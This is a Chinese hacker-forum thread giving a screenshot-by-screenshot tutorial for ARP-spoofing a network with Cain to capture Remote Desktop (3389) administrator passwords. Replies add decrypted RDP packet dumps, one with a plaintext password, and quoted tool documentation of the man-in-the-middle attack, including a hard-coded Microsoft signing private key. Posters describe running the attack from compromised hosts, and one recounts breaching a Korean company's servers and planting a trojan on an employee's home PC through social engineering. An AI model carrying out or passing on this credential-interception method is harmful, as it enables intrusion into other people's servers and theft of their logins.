[原创]3389的密码嗅探
信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])文章作者:凋凌玫瑰[N.C.P.H]
Arp欺骗加嗅探,玩黑的朋友一定不会陌生,大家玩得最多的就是在同网段中嗅探ftp的密码,所以一般都喜欢渗透的主站开个ftp,但更多的时候是主站开3389的机率要比ftp大吧,如果能直接嗅探3389岂不是更爽。
Cain是大家都熟悉的一款软件,具有arp欺骗加嗅探和密码破解的功能,这里提供一个最新版的下载地址:[url]http://www.ncph.net/cain.exe[/url],具体用法就不多讲了,相信大家都会用这个。本来cain就自带了嗅探终端(3389)密码的功能,但没有听用过,以前我也没有用过这个功能,但一次无意间使用嗅探时开了嗅探3389的功能,最后其它的什么都没有嗅探到,去嗅探到了一个RDP值,打开一分析,原来3389的密码就在其中。
很多朋友看了我的blog中的那个网站的渗透,都问我怎么嗅探到3389密码的,所以我打算把这个写出来共享给大家,转载请注明。
这里给大家做一个图文教程:首先安装cain.exe,默认安装就ok.
1.打开sniffer页面:
[attach]5418[/attach]
2.打开端口配置,设置嗅探3389端口:
[attach]5415[/attach]
3.点击嗅探和右击扫描mac:
[attach]5416[/attach]
4.打开arp页面,单击“+”号,打开欺骗设置:
[attach]5419[/attach]
5.左边选网关,右边选欺骗的ip:
[attach]5420[/attach]
6.点击欺骗按钮开始欺骗:
[attach]5417[/attach]
7.显示欺骗到一条数据:
[attach]5421[/attach]
8.选择arp-rdp,在右边栏中右击数据:
[attach]5422[/attach]
9.右击后打开的文档:
[attach]5423[/attach]
10:在文档中找到3389的管理员登录用户名和密码:
[attach]5424[/attach]
以上在外网和内网中测试通过,可以准确地抓到管理员密码,但必须是管理员登录成功后才能抓到,其实cain利用了arp欺骗截取数据传输封包,并且能破解3389的加密协议,软件不错。 [quote][b]引用第2楼[i]xiaozei[/i]于[i]2007-02-05 07:51[/i]发表的[/b]:
再去分析下嗅QQ....[/quote]
QQ除了UDP外,貌似是根据自己的协议通信,就算你嗅到了,你也无法解密.. 不是吧 能抓到3389的密码并破译?
天啊,我以前嗅了N多这个啊,都丢掉了 [s:35]
晕死,以前没有注意啊,原来在右边啊 .A.d.m.i.n.......... NCPH大哥。确实强悍!
不过上次去了你的站点/卡巴出现安全提示……
不知道何故!?
小弟学习了```拜谢!
TO:QQ除了UDP外,貌似是根据自己的协议通信,就算你嗅到了,你也无法解密..
记得以前在哪看过一个嗅探QQ密码的教程,不过原理好像是QQ的一个漏洞。应该补上了```不过相比还有高人可以的。对不? 你是说我的blog吧,因为里面调用了js,所以卡巴误报. 这个功能早注意到了 不过想到不如做到
很少人去嗅探3389 [quote][b]引用第5楼[i]凋凌玫瑰[/i]于[i]2007-02-05 14:20[/i]发表的[/b]:
你是说我的blog吧,因为里面调用了js,所以卡巴误报.[/quote]
呵呵``想想也是。
不过小弟是在公司上网,所以不敢有什么闪失。
何况大哥是高人,呵呵```小弟菜鸟```小心行的万年船。对不?呵呵 在肉鸡上逛翻了一遍RDP文件
发现 用户名后面的都是空的,没有密码 [s:34] 用它在肉雞上嗅探,肉雞會斷線嗎? [Client decrypted packet] - 347 bytes total; 320 bytes decrypted
0000 03 00 01 5b 02 f0 80 64 00 06 03 eb 70 81 4c 48 ...[...d....p.LH
0010 00 00 00 41 64 62 41 5e 55 7e 26 04 04 04 04 b3 ...AdbA^U~&.....
0020 43 00 00 08 00 06 00 00 00 00 00 00 00 47 00 50 C............G.P
0030 00 53 00 32 00 00 00 72 00 61 00 79 00 00 00 00 .S.2...r.a.y....
0040 00 00 00 00 00 02 00 1a 00 31 00 39 00 32 00 2e .........1.9.2..
0050 00 31 00 36 00 38 00 2e 00 31 00 31 00 2e 00 32 .1.6.8...1.1...2
0060 00 00 00 40 00 43 00 3a 00 5c 00 57 00 49 00 4e ...@.C.:.\.W.I.N
0070 00 44 00 4f 00 57 00 53 00 5c 00 73 00 79 00 73 .D.O.W.S.\.s.y.s
0080 00 74 00 65 00 6d 00 33 00 32 00 5c 00 6d 00 73 .t.e.m.3.2.\.m.s
0090 00 74 00 73 00 63 00 61 00 78 00 2e 00 64 00 6c .t.s.c.a.x...d.l
00a0 00 6c 00 00 00 20 fe ff ff 2d 4e 0b 57 19 6a 96 .l... ...-N.W.j.
00b0 6e 42 66 93 95 00 00 00 00 00 00 00 00 00 00 00 nBf.............
用戶是ray,為什麼密碼是......???? 貌似我和15楼一样
没密码。只有我本机的IP 奇怪,在別的網段試了第2次,這次一台用administrator 登入,密碼出來了 可以研究一下
好像是新版的cain才带有的
这个东东撇开wincap不说就是绿色的 :)
曾经试过嗅Voip,好像不怎么好用。 我經過測試,測試結果如下
1.用ray登入: 找不到密碼
[Client decrypted packet] - 357 bytes total; 330 bytes decrypted
0000 03 00 01 65 02 f0 80 64 00 06 03 eb 70 81 56 48 ...e...d....p.VH
0010 00 00 00 6d 1d 5d 6d 6d 65 09 a3 04 04 04 04 b3 ...m.]mme.......
0020 43 00 00 12 00 06 00 00 00 00 00 00 00 53 00 54 C............S.T
0030 00 52 00 45 00 41 00 4d 00 49 00 4e 00 47 00 00 .R.E.A.M.I.N.G..
0040 00 72 00 61 00 79 00 00 00 00 00 00 00 00 00 02 .r.a.y..........
0050 00 1a 00 31 00 39 00 32 00 2e 00 31 00 36 00 38 ...1.9.2...1.6.8
0060 00 2e 00 31 00 31 00 2e 00 32 00 00 00 40 00 43 ...1.1...2...@.C
0070 00 3a 00 5c 00 57 00 49 00 4e 00 44 00 4f 00 57 .:.\.W.I.N.D.O.W
0080 00 53 00 5c 00 73 00 79 00 73 00 74 00 65 00 6d .S.\.s.y.s.t.e.m
0090 00 33 00 32 00 5c 00 6d 00 73 00 74 00 73 00 63 .3.2.\.m.s.t.s.c
00a0 00 61 00 78 00 2e 00 64 00 6c 00 6c 00 00 00 20 .a.x...d.l.l...
00b0 fe ff ff 2d 4e 0b 57 19 6a 96 6e 42 66 93 95 00 ...-N.W.j.nBf...
00c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
2.用administartor登入 : 找到密碼(asdf1234)
[Client decrypted packet] - 375 bytes total; 348 bytes decrypted
0000 03 00 01 77 02 f0 80 64 00 06 03 eb 70 81 68 48 ...w...d....p.hH
0010 00 00 00 3f 47 11 df d2 b4 5a 85 04 04 04 04 bb ...?G....Z......
0020 43 00 00 00 00 1a 00 10 00 00 00 00 00 00 00 61 C..............a
0030 00 64 00 6d 00 69 00 6e 00 69 00 73 00 74 00 72 .d.m.i.n.i.s.t.r
0040 00 61 00 74 00 6f 00 72 00 00 00 61 00 73 00 64 .a.t.o.r...a.s.d
0050 00 66 00 31 00 32 00 33 00 34 00 00 00 00 00 00 .f.1.2.3.4......
0060 00 02 00 1a 00 31 00 39 00 32 00 2e 00 31 00 36 .....1.9.2...1.6
0070 00 38 00 2e 00 31 00 31 00 2e 00 32 00 00 00 40 .8...1.1...2...@
0080 00 43 00 3a 00 5c 00 57 00 49 00 4e 00 44 00 4f .C.:.\.W.I.N.D.O
0090 00 57 00 53 00 5c 00 73 00 79 00 73 00 74 00 65 .W.S.\.s.y.s.t.e
00a0 00 6d 00 33 00 32 00 5c 00 6d 00 73 00 74 00 73 .m.3.2.\.m.s.t.s
00b0 00 63 00 61 00 78 00 2e 00 64 00 6c 00 6c 00 00 .c.a.x...d.l.l..
00c0 00 20 fe ff ff 2d 4e 0b 57 19 6a 96 6e 42 66 93 . ...-N.W.j.nBf.
00d0 95 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3.用提了權的guest登入: 找不到密碼
[Client decrypted packet] - 359 bytes total; 332 bytes decrypted
0000 03 00 01 67 02 f0 80 64 00 06 03 eb 70 81 58 48 ...g...d....p.XH
0010 00 00 00 0a 58 35 a1 ea 85 55 84 04 04 04 04 b3 ....X5...U......
0020 43 00 00 00 00 1a 00 00 00 00 00 00 00 00 00 61 C..............a
0030 00 64 00 6d 00 69 00 6e 00 69 00 73 00 74 00 72 .d.m.i.n.i.s.t.r
0040 00 61 00 74 00 6f 00 72 00 00 00 00 00 00 00 00 .a.t.o.r........
0050 00 02 00 1a 00 31 00 39 00 32 00 2e 00 31 00 36 .....1.9.2...1.6
0060 00 38 00 2e 00 31 00 31 00 2e 00 32 00 00 00 40 .8...1.1...2...@
0070 00 43 00 3a 00 5c 00 57 00 49 00 4e 00 44 00 4f .C.:.\.W.I.N.D.O
0080 00 57 00 53 00 5c 00 73 00 79 00 73 00 74 00 65 .W.S.\.s.y.s.t.e
0090 00 6d 00 33 00 32 00 5c 00 6d 00 73 00 74 00 73 .m.3.2.\.m.s.t.s
00a0 00 63 00 61 00 78 00 2e 00 64 00 6c 00 6c 00 00 .c.a.x...d.l.l..
00b0 00 20 fe ff ff 2d 4e 0b 57 19 6a 96 6e 42 66 93 . ...-N.W.j.nBf.
00c0 95 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 好象只能嗅探 到 Administrator 其他不行..望能解答下 我在arp台湾一台2003的3389的时候。Administrator登录,密码没拿到。
我猜想可能不是内置的那个Administrator用户吧。
15楼的兄弟的测试不错,顶你下。
玫瑰在文章中也注明了:需要administrator用户成功登录才能弄到密码。
还有个有意思的现象。
[img]http://www.ncph.net/newncph/edit/UploadFile/20072464647508.jpg[/img]
后面的c:\windows\system32 那个不是肉鸡的路径,是客户端的喔。 CAIN 对2003 效果不错
2000还是用winpcap 成功率高点`` 没有测试,毕竟不少机器都不开终端的。
另:玫瑰可否把你clone帐号的具体操作步骤说下,我测试N台机器无论是cmd下删除还是用户管理界面删除,只要带了$符号,重新启动后还是会在用户管理下显示出来。 好像很多机器都不一定使用Administrator登陆
或者改了用户名 那样的话 概率是不是太小了? 非内置帐号密码是可以嗅到的,另外玫瑰搞错了。其实CAIN以前的版本一样可以嗅到~至于嗅不到,可能与加密强度有关 [s:73] 加密强度都一样吧?我真不知道哪种算法里对密码的加密强度还存在不同。(我比较无知)每个版本相同的系统下加密强度都是相同的,跨版本我不知道了。楼上指的是RC4?
他本地保存文件中的密码是1329位。
可能被抓到是管理员某种所造成的吧。
建议朋友们去看看cain的帮助文档,我翻看了下,关于这里的叙述比较翔实。
复制下,有喜欢的看看?
[code]
APR-RDP
APR-RDP enables the capture and the decryption of Remote Desktop Protocol (RDP) traffic between hosts. RDP is the protocol used to connect to Windows Terminal Services of a remote computer.
Microsoft's Windows Terminal Services (built into Windows 2000 Server and Windows Server 2003) and Windows XP's Remote Desktop, provide an easy, convenient way for administrators to implement thin computing within an organization or for users to connect to their XP desktops from a remote computer and run applications or access files.
A Windows 2000 terminal server can be installed in one of two modes: administrative or application server. In administrative mode, only users with administrative accounts can access the terminal server .... this is why these sessions are so interesting.
By default, data that travels between the terminal server and the terminal services client is protected by encryption. The protocol uses the RC4 symmetric encryption algorithm
at one of the following three levels:
High: encrypts both the data sent from client to server and the data sent from server to client using a 128-bit key.
Medium: encrypts both the data sent from client to server and the data sent from server to client using a 56-bit key if the client is a Windows 2000 or above client, or a 40-bit key if the client is an earlier version.
Low: encrypts only the data sent from client to server, using either a 56-bit or 40-bit key, depending on the client version.
RC4 encryption keys are generated after an initial key exchange in which RSA asymmetric encryption is used.
In April 2003 Erik Forsberg released a security advisory to the public ( [url]http://www.securityfocus.com/archive/1/317244[/url] ) explaining that:
"... During extensive investigation of the Remote Desktop Protocol (RDP), the protocol used to connect to Windows Terminal Services, we have found that although the information sent over the network is encrypted, there is no verification of the identity of the server when setting up the encryption keys for the session. This means RDP is vulnerable to Man In The Middle attacks (from here on referred to as MITM attacks). The attack works as follows:
1) The client connects to the server, however by some method (DNS spoofing, arp poisioning, etc.) we've fooled it to connect to the MITM instead. The MITM sends the request further to the server.
2) The server sends it's public key and a random salt, in cleartext, again through the MITM. The MITM sends the packet further to the client, but exchanges the public key to another one for which it knows the private part.
3) The client sends a random salt, encrypted with the server public key, to the MITM.
4) The MITM deencrypts the clients random salt with it's private key, encrypts it with the real servers public key and sends it to the server.
5) The MITM now know both the server and the client salt, which is enough information to construct the session keys used for further packets sent between the client and the server. All information sent between the parts can now be read in cleartext.
The vulnerability occurs because the clients by no means try to verify the public key of the server, sent in step 2 above. In other protocols, such as the Secure Shell protocol, most client implementations solve this for example by letting the user answer a question whether a specific serverkey fingerprint is valid. ..."
Microsoft confirmed the above problem and fixed the new versions of Remote Desktop Clients. Recent clients (mstsc.exe), including the one of version XPSP2 5.1.2600.2180, now check the Terminal Server identity verifying its public key. They solved the problem ? No, man-in-the-middle attacks are still possible and can be really invisible for users.
During the initial key-exchange phase, the terminal server sends to the client a server certificate created at the start up of Terminal Server services. This certificate is stored in the registry of the server under the following key:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService\Parameters\Certificate
It contains an RSA public key and its digital signature as illustrated below:
The public key modulus (n) is the same as the one present in the RSA2 key stored in the LSA Secret "L$HYDRAENCKEY" (you can use the Cain's LSA Secret Dumper to check it) of the server; the signature is the information used by the client to verify the server identity.
From a man-in-the-middle attacker's point of view, the public key signature must be modified on the fly to trick the client into verifying the new Mitm public key that will be replaced into the network packet directed to the client. But … what is used to produce this signature ?
Well, a digital signature is noting more nothing less than a hash of something (in this case a server public key) encrypted using a private key and an asymmetric encryption algorithm. This is exactly what is done by the terminal server. At the client-side, this signature is decrypted using a public key and the result is compared with a new hash of the received server public key calculated by the client; if the two hashes match the identity of the server is proven.
Microsoft use another RSA private key to sign the Terminal Server public key and this private key is public ! It could sound strange but this is only the truth, the private key used for the signature creation is hard-coded into mstlsapi.dll and it is dynamically created, used and de-allocated into a subroutine of the "TLSInit" API. Every Windows user has this file ... is this a new kind of public-private key (PPK) ?!?
The Microsoft Windows Terminal Server PPK follows:
public exponent: e
0x5B,0x7B,0x88,0xC0
public modulus: n
0x3D,0x3A,0x5E,0xBD,0x72,0x43,0x3E,0xC9,0x4D,0xBB,0xC1,0x1E,0x4A,0xBA,0x5F,0xCB,
0x3E,0x88,0x20,0x87,0xEF,0xF5,0xC1,0xE2,0xD7,0xB7,0x6B,0x9A,0xF2,0x52,0x45,0x95,
0xCE,0x63,0x65,0x6B,0x58,0x3A,0xFE,0xEF,0x7C,0xE7,0xBF,0xFE,0x3D,0xF6,0x5C,0x7D,
0x6C,0x5E,0x06,0x09,0x1A,0xF5,0x61,0xBB,0x20,0x93,0x09,0x5F,0x05,0x6D,0xEA,0x87,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
private exponent: d
0x87,0xA7,0x19,0x32,0xDA,0x11,0x87,0x55,0x58,0x00,0x16,0x16,0x25,0x65,0x68,0xF8,
0x24,0x3E,0xE6,0xFA,0xE9,0x67,0x49,0x94,0xCF,0x92,0xCC,0x33,0x99,0xE8,0x08,0x60,
0x17,0x9A,0x12,0x9F,0x24,0xDD,0xB1,0x24,0x99,0xC7,0x3A,0xB8,0x0A,0x7B,0x0D,0xDD,
0x35,0x07,0x79,0x17,0x0B,0x51,0x9B,0xB3,0xC7,0x10,0x01,0x13,0xE7,0x3F,0xF3,0x5F,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
secret prime factor: p
0x3F,0xBD,0x29,0x20,0x57,0xD2,0x3B,0xF1,0x07,0xFA,0xDF,0xC1,0x16,0x31,0xE4,0x95,
0xEA,0xC1,0x2A,0x46,0x2B,0xAD,0x88,0x57,0x55,0xF0,0x57,0x58,0xC6,0x6F,0x95,0xEB,
0x00,0x00,0x00,0x00
secret prime factor: q
0x83,0xDD,0x9D,0xD0,0x03,0xB1,0x5A,0x9B,0x9E,0xB4,0x63,0x02,0x43,0x3E,0xDF,0xB0,
0x52,0x83,0x5F,0x6A,0x03,0xE7,0xD6,0x78,0x45,0x83,0x6A,0x5B,0xC4,0xCB,0xB1,0x93,
0x00,0x00,0x00,0x00
d mod (p-1): dmp1
0x65,0x9D,0x43,0xE8,0x48,0x17,0xCD,0x29,0x7E,0xB9,0x26,0x5C,0x79,0x66,0x58,0x61,
0x72,0x86,0x6A,0xA3,0x63,0xAD,0x63,0xB8,0xE1,0x80,0x4C,0x0F,0x36,0x7D,0xD9,0xA6,
0x00,0x00,0x00,0x00
d mod (q-1): dmq1
0x75,0x3F,0xEF,0x5A,0x01,0x5F,0xF6,0x0E,0xD7,0xCD,0x59,0x1C,0xC6,0xEC,0xDE,0xF3,
0x5A,0x03,0x09,0xFF,0xF5,0x23,0xCC,0x90,0x27,0x1D,0xAA,0x29,0x60,0xDE,0x05,0x6E,
0x00,0x00,0x00,0x00
q^-1 mod p: iqmp
0xC0,0x17,0x0E,0x57,0xF8,0x9E,0xD9,0x5C,0xF5,0xB9,0x3A,0xFC,0x0E,0xE2,0x33,0x27,
0x59,0x1D,0xD0,0x97,0x4A,0xB1,0xB1,0x1F,0xC3,0x37,0xD1,0xD6,0xE6,0x9B,0x35,0xAB,
0x00,0x00,0x00,0x00
The knowledge of the PPK key lets the attacker calculate a valid signature for the mitm public key generated on the fly during the mitm attack; the client will verify the mitm signature correctly and it will accept the session without informing the users that the server key is changed from the usual one.
The signature is calculated encrypting, with the private part of the PPK key, the MD5 hash of the server public key for a total of 108 bytes hashed.
How it works
0) The network packet from the server is hijacked and captured by mean of APR (ARP Poison Routing).
1) The server random and the real server public key are extracted from the packet and stored for future usage.
2) The server public key is replaced in the network packet with a new one generated by Cain (the mitm machine) during the key exchange phase.
3) The MD5 hash of the new mitm public key is calculated.
4) The hash is signed by Cain (encrypted using the private key) using the super secret Microsoft PPK illustrated above.
5) The mitm sign is replaced into the network packet.
6) The packet is routed by APR to the client.
7) The network packet from the client is hijacked and captured by mean of APR (ARP Poison Routing).
8) The client encrypted random is decrypted using the mitm private key.
9) The client random is encrypted using the real server public key and replaced into the network packet for the server.
10) The packet is routed by APR to the server.
11) RC4 symmetric encryption keys are calculated.
12) The key entropy is reduced accordingly with the encryption level used in the session.
13) Packets are decrypted and saved locally to text files.
Authentication
Cain also try to recognize the keyboard activity at the client-side. This provide some kind of password interception.
Prerequisites
This feature needs APR to be enabled and a Man-in-the-Middle condition between the Terminal Server and the victim host.
[/code]
告诉有心人,管理员保存了密码的2003的机器测试能嗅到,猪三同学发现的。我怀疑与cain的本地终端密码破解有些关联。不过没有研究,不敢多说。 [quote][b]引用第21楼[i]好菜[/i]于[i]2007-02-07 12:34[/i]发表的[/b]:
没有测试,毕竟不少机器都不开终端的。
另:玫瑰可否把你clone帐号的具体操作步骤说下,我测试N台机器无论是cmd下删除还是用户管理界面删除,只要带了$符号,重新启动后还是会在用户管理下显示出来。[/quote]
1 同问~我也很想知道这点
2 不开终端的情况就比较BT...不过考虑到服务器机房恶劣的环境,一般不会有人去物理接触服务器的,用pcanywhere管理么?这个怎么嗅呢... [quote][b]引用第10楼[i]raydan[/i]于[i]2007-02-05 19:58[/i]发表的[/b]:
用它在肉雞上嗅探,肉雞會斷線嗎?[/quote]
这个跟arp欺骗有关系,成功欺骗嗅探的时候,目标机和网关都会被arp欺骗,由你来中转数据,不会断网。但如果二者有一个欺骗失败了,目标机就会断网。你这边的现象就是:cain的arp一栏都是“半路由”。
如果欺骗目标机失败,他发出的数据直奔网关,但网关把返回数据发给了你,他断网。如果欺骗网关失败,数据会成功地经你转发网关,网关会把返回数据发给目标机,但他不认识,给丢弃了,因为他把你当成网关了。
其中后一种情况还是可以嗅到密码的,但你会发现嗅探结果有大量重复的数据,为什么呢?想象一下,那哥们一遍又一遍的输入密码,但就是登不进去...由于数据发到你机器上了,所以你可以得到你想要的东西。
至于为什么有时候会欺骗不成功,有可能是装了AntiARPSniffer,或者和网关的设置有关 对外网嗅探成功么?在输入IP那里输入外网IP不行 会不会和嗅机的系统有关?
比如2000对2000嗅 2003对2003嗅?
有环境的兄弟测试一下,呵呵~~ [s:75] 铞,其实木有这么好嗅的,只能算是运气的说,只有XP和2003可以嗅得到明文,而且是在管理员把ts连接保存为RDP文件并保存了密码,或者是用控制台节点进行了保存密码而进行的登陆,可以嗅到密码的,一般在那些大猪站爱用这种登陆方式,例如wz16300.com 密码变态复杂. 3389密码随便能给你嗅到那不是天下无敌?铞。 [楼上的大瞎。貌似是可以嗅到没保存密码和RDP的密码的,我自己测试过。 呵呵,猪三一定是没有去测试过,在群里也是听你这样说,先前我抓到密码时候也是在想是不是管理员保存了本地密码自动登录才抓到的,最后专门搭建了一个环境测试,的确可以抓到手动登录的。cain的帮助文档我没有去看过,对于有些人说的只能抓到administrator的密码,其实还有一些东西需要自己去研究了,不要什么都等别人说出来。。。。点到为止。 [Client decrypted packet] - 361 bytes total; 334 bytes decrypted
0000 03 00 01 69 02 f0 80 64 00 06 03 eb 70 81 5a 48 ...i...d....p.ZH
0010 00 00 00 1d 07 e3 16 3a 87 b9 fe 04 08 04 08 b3 .......:........
0020 43 00 00 00 00 1a 00 00 00 00 00 00 00 00 00 41 C..............A
0030 00 64 00 6d 00 69 00 6e 00 69 00 73 00 74 00 72 .d.m.i.n.i.s.t.r
0040 00 61 00 74 00 6f 00 72 00 00 00 00 00 00 00 00 .a.t.o.r........
0050 00 02 00 1c 00 36 00 30 00 2e 00 31 00 36 00 34 .....6.0...1.6.4
0060 00 2e 00 33 00 30 00 2e 00 32 00 31 00 32 00 00 ...3.0...2.1.2..
0070 00 40 00 43 00 3a 00 5c 00 57 00 49 00 4e 00 44 .@.C.:.\.W.I.N.D
0080 00 4f 00 57 00 53 00 5c 00 73 00 79 00 73 00 74 .O.W.S.\.s.y.s.t
0090 00 65 00 6d 00 33 00 32 00 5c 00 6d 00 73 00 74 .e.m.3.2.\.m.s.t
00a0 00 73 00 63 00 61 00 78 00 2e 00 64 00 6c 00 6c .s.c.a.x...d.l.l
00b0 00 00 00 20 fe ff ff 2d 4e fd 56 07 68 c6 51 f6 ... ...-N.V.h.Q.
============================================================
试了几个,都不是明密码,肉机2003,目标2000。 [s:36] [s:36] [s:36]
[s:35] 有时还会假死5分钟后就死机,(只嗅3389) 目前我的测试只能证明 猪三的 经验是正确的
环境:两台处于同一交换机下的2003server,我在其中一台安装cain4.2 (从玫瑰那下载的),配置sniffer终端RDP。(端口被我修改了,不是默认的3389,但我想不影响结果)
我注意到这样一个现象:
开启arp欺骗之后,我[color=red]使用3389客户端远程连接的时候,一连上目标机子(还未输入密码)的时候,就发现在cain的RDP嗅探数据中已经有了捕获数据[/color]。然后我输入正确的帐号和密码成功登陆,完成后,再查看捕获的数据。正常情况下出现用户名的地方是我终端客户端开始已存的用户名而非我正确登陆的用户名,后面没有密码。然后我查找数据。分析用户名出现的规则:n.a.m.e 这样的,进行全文搜索,结果是我能够找到正确登陆的用户名,密码仍然没有。(密码出现的规则也是p.a.s.s这样)
接下来我再做两个测试:
使用administrators组非administrator用户登陆
1。在客户端不保存密码,嗅探结果,密码没有获得
2。在客户端保存密码,嗅探结果:获得明文密码
不知道玫瑰还有什么秘笈,望不吝赐教! 看起来只有在客户端保存密码的才能成功
那就要靠个人运气了 密码倒是嗅到了,可是账号怎么还是administrator,明明是别的用户登陆的. [quote][b]引用第36楼[i]唐不狐[/i]于[i]2007-02-11 20:09[/i]发表的[/b]:
目前我的测试只能证明 猪三的 经验是正确的
环境:两台处于同一交换机下的2003server,我在其中一台安装cain4.2 (从玫瑰那下载的),配置sniffer终端RDP。(端口被我修改了,不是默认的3389,但我想不影响结果)
我注意到这样一个现象:
开启arp欺骗之后,我[color=red]使用3389客户端远程连接的时候,一连上目标机子(还未输入密码)的时候,就发现在cain的RDP嗅探数据中已经有了捕获数据[/color]。然后我输入正确的帐号和密码成功登陆,完成后,再查看捕获的数据。正常情况下出现用户名的地方是我终端客户端开始已存的用户名而非我正确登陆的用户名,后面没有密码。然后我查找数据。分析用户名出现的规则:n.a.m.e 这样的,进行全文搜索,结果是我能够找到正确登陆的用户名,密码仍然没有。(密码出现的规则也是p.a.s.s这样)
.......[/quote]
两天没上,准备说的让 唐不狐 说了...
实验过程入下
肉鸡,韩国一大公司数据库服务器A,2000系统,同一公司内网下几乎所以职员计算机都开了3389,XP系统,选择其中一目标B(设主人为Z),通过社会工程学,让Z家中的电脑C 中我的HGZ,在A上开CAIN嗅谈B的3389,通过HGZ屏幕监控,看到Z用C登陆B的3389,登陆筐原始显示的帐户是ABC,但是C用帐号XYZ,密码UVW登陆,登陆成功后,我马上登陆A查看CAIN嗅得的数据,只显示了域,用户名ABC,C的IP地址等...没有出现XYZ也没有出现UVW...Z退出B后,我给C开3389双登陆,通过C,用帐号XYZ,密码UVW登陆B,在A中嗅到的只有XYZ没有密码UVW,通过我本地登陆B也是一样..
不知哪位高手能说明一下. 在局域网还是用SUFFER比较好点`
嗅探的成功率也高~ 玫瑰 我按照你的方法安装
但是到了那个 ARP 那个+号是隐的
怎么会是 我装WINPCAP的时候出现这个
是不是这个问题哦
[img]http://www.cfsbw.com/Images/0.jpg[/img]
[img]http://www.cfsbw.com/Images/1.jpg[/img]
各位知道的 说一下吧 有密码习惯的还只是少数人啊
不过楼主这个方法不错,看来针对3389的文章是越来越多了 ***************************************
- Symmetric encryption phase reached...
***************************************
[Client decrypted packet] - 365 bytes total; 338 bytes decrypted
0000 03 00 01 6d 02 f0 80 64 00 06 03 eb 70 81 5e 48 ...m...d....p.^H
0010 00 00 00 7a 87 c9 73 72 47 c2 79 04 08 04 08 b3 ...z..srG.y.....
0020 43 00 00 08 00 1a 00 00 00 00 00 00 00 59 00 4d C............Y.M
0030 00 53 00 54 00 00 00 61 00 64 00 6d 00 69 00 6e .S.T...a.d.m.i.n
0040 00 69 00 73 00 74 00 72 00 61 00 74 00 6f 00 72 .i.s.t.r.a.t.o.r
0050 00 00 00 00 00 00 00 00 00 02 00 18 00 31 00 39 .............1.9
0060 00 32 00 2e 00 31 00 36 00 38 00 2e 00 31 00 2e .2...1.6.8...1..
0070 00 39 00 00 00 40 00 43 00 3a 00 5c 00 57 00 49 .9...@.C.:.\.W.I
0080 00 4e 00 44 00 4f 00 57 00 53 00 5c 00 73 00 79 .N.D.O.W.S.\.s.y
0090 00 73 00 74 00 65 00 6d 00 33 00 32 00 5c 00 6d .s.t.e.m.3.2.\.m
00a0 00 73 00 74 00 73 00 63 00 61 00 78 00 2e 00 64 .s.t.s.c.a.x...d
00b0 00 6c 00 6c 00 00 00 20 fe ff ff 2d 4e fd 56 07 .l.l... ...-N.V.
00c0 68 c6 51 f6 65 f4 95 00 00 00 00 00 00 00 00 00 h.Q.e...........
[s:289] 没成功,后面直接出来的是IP!~~~怎么回事,解答下`` 以前看到过一个QQ教程说是在本机上的可以破解
不知道是不是啊 在外网也能抓到3389的密码并破译吗?偶测试了一下好象只能嗅探 到 Administrator ,但密码却毫无结果,不知什么原因? 用這個目前在這里有格問題。
本機ipconfig /all 顯示ip位 192.168.1.20
在運行sniffer之后, 嗅探不到本機ip與真實mac地址。
應該如何處理? [客户端解码的数据包] - 共 919 个字节; 892 个解码的字节
0000 03 00 03 97 02 f0 80 64 00 06 03 eb 70 83 88 48 .......d....p..H
0010 00 00 00 af 3d d0 81 b3 b7 37 fa 00 00 00 00 b3 ....=....7......
0020 03 00 00 0c 00 1a 00 00 02 00 00 00 00 4f 00 47 .............O.G
0030 00 57 00 45 00 42 00 33 00 00 00 41 00 64 00 6d .W.E.B.3...A.d.m
0040 00 69 00 6e 00 69 00 73 00 74 00 72 00 61 00 74 .i.n.i.s.t.r.a.t
0050 00 6f 00 72 00 00 00 a5 7a e3 db 97 d9 38 c8 31 .o.r....z....8.1
0060 94 59 88 24 2e f2 4d 2a 8c a7 c3 ee 09 84 84 a0 .Y.$..M*........
0070 30 6d b6 26 f3 63 f1 f6 91 77 f9 b4 4f 16 28 c2 0m.&.c...w..O.(.
0080 ec 19 77 a0 73 91 3b 75 b4 80 ef fe 1e 6a e5 15 ..w.s.;u.....j..
0090 98 13 56 73 b5 1d f7 86 da ff aa bb 0b bb 1a 8d ..Vs............
00a0 02 9c 5a 1a 68 ca d0 48 d7 5c 7a 60 23 b4 23 88 ..Z.h..H.\z`#.#.
00b0 ae 85 ee bb 5d 38 4e 32 24 81 d4 f3 9d 20 1e 79 ....]8N2$.... .y
00c0 ba d6 ad 3c b4 09 02 4c 28 04 27 18 33 57 67 5b ...<...L(.'.3Wg[
00d0 a2 7f 63 c6 84 df f1 a4 eb f6 c9 0f 51 61 3b b1 ..c.........Qa;.
00e0 f3 f6 47 2a 5a c7 48 0f ab 6d b7 0a 7c 25 52 4f ..G*Z.H..m..|%RO
00f0 62 26 48 59 34 26 37 de d4 e7 82 0b e2 83 9f de b&HY4&7.........
0100 c0 3d ad 59 d1 7d aa 51 da 8e 84 9b 2c 0e 2a 72 .=.Y.}.Q....,.*r
0110 4f 52 fd 0f d3 23 b9 dc 2b 5a cc 99 30 f7 11 6e OR...#..+Z..0..n
0120 23 90 4d c0 13 c4 6f 60 0b 8d ad a7 84 e2 c3 8d #.M...o`........
0130 bd 3d 7d 54 ec b6 50 8a 44 b4 91 b4 45 5e 4b bd .=}T..P.D...E^K.
0140 ab 90 9f 5a f8 71 16 04 42 5b de 26 5f a4 df ee ...Z.q..B[.&_...
0150 33 ec b6 7d c0 52 8d 0d 3a 25 fc 79 ca fa 58 aa 3..}.R..:%.y..X.
0160 6c e2 7c a6 83 32 03 fe a9 4b 5b 34 fb 3b 6e 10 l.|..2...K[4.;n.
